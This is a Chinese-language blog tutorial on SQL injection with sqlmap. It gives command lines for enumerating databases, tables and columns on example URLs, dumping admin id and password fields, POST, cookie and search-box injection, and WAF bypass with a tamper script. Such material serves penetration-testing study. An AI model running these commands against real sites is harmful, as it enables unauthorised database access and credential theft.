SQL注入攻击

释放双眼,带上耳机,听听看~!

0x00

前言:

kali linux集成了很多工具,其中,sqlmap为测试者所常用的工具(如果使用者的平台为windows则需要下载Python,然后前往sqlmap的官网下载安装包)

安装sqlmap:

apt-get install sqlmap 从你设置的源,下载sqlmap,并安装

检查注入点:

sqlmap -u http://aa.com/star_photo.php?artist_id=11
爆所有数据库信息:

sqlmap -u http://aa.com/star_photo.php?artist_id=11 –dbs
爆当前数据库信息:

sqlmap -u http://aa.com/star_photo.php?artist_id=11 –current-db
指定库名列出所有表

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D admin –tables

‘vhost48330’ 为指定数据库名称
指定库名表名列出所有字段
admin,password,
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin –columns
‘admin’ 为指定表名称
指定库名表名字段dump出指定字段

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password –dump
‘ac,id,password’ 为指定字段名称

Sqlmap之Post注入

方法一:

sqlmap -r test.txt -p “抓包到的post数据里面的其中一个post参数” –dbs

解释意思/sqlamp进行post注入并且假如存在注入就返回数据库的信息,test.txt文档就是对网页抓到的包全选数据包内容然后保存为test.txt文件,直接-r test.txt是把文档放在与sqlmap同一目录下的才行。-p是指定参数注入,更精准/

假如不是放在与sqlmap同一目录下的话,那么就是sqlmap.py -r D:test.txt -p “抓包到的post数据里面的其中一个post参数” –db

方法二:

sqlmap -u “存在注入的url,一般多用于后台” –data=”抓到的post包的最后一行的内容” -p “指定post包里面的某一个参数”

方法三:

假设有个网站,url地址为:http://www.127.0.0.1/base64?id=10

假如想测试这个页面是否有post注入

用这个方式:sqlmap -u “http://www.127.0.0.1/base64” –data=”id=10” -f –banner –dbs

方法四:

自动注入方法

sqlmap -u “http://xxxxxx.com(cn/net/org)/login.asp(php,aspx,jsp等程序格式)” –forms 一般用于后台注入。

Sqlmap之cookie注入

方法一:

假设有个网站,url地址为:http://www.127.0.0.1/base32?id=45

假如想测试这个页面是否有cookie注入

采用的注入方式如下:sqlmap -u “http://www.127.0.0.1/base32” –data=”id=10” –dbs –level 2

对方法一的解释/level 2是探测等级的意思,这里采用注入选择探测等级为2,当探测等级为2或2以上sqlmap是会尝试注入cookie参数的/

方法二:

sqlmap -u “存在注入url” –cookie=”抓包抓到的cookie”

或者是这样使用:sqlmap.py -u “存在注入url” –cookir=”抓包抓到的cookie” –level 2 //前面讲过了探测等级为2就注入cookie参数的

Sqlmap之搜索框注入

搜索框注入感觉和post注入简直一模一样,只不过形式是注入搜索框而不是

username或password。

方法一:

sqlmap -u “http://xxxxxx.com/search.php(asp,aspx,jsp)” –data=”抓包到的搜索框的信息” -p “指定搜索框里面的一个参数值”

waf绕过
sqlmap -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

给TA买糖
共{{data.count}}人
人已赞赏
web安全

记一次edusrc密码重置挖掘发现的通用漏洞

2021-1-7 19:59:57

web安全

记一次edusrc密码重置挖掘发现的通用漏洞

2021-1-7 19:59:57

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索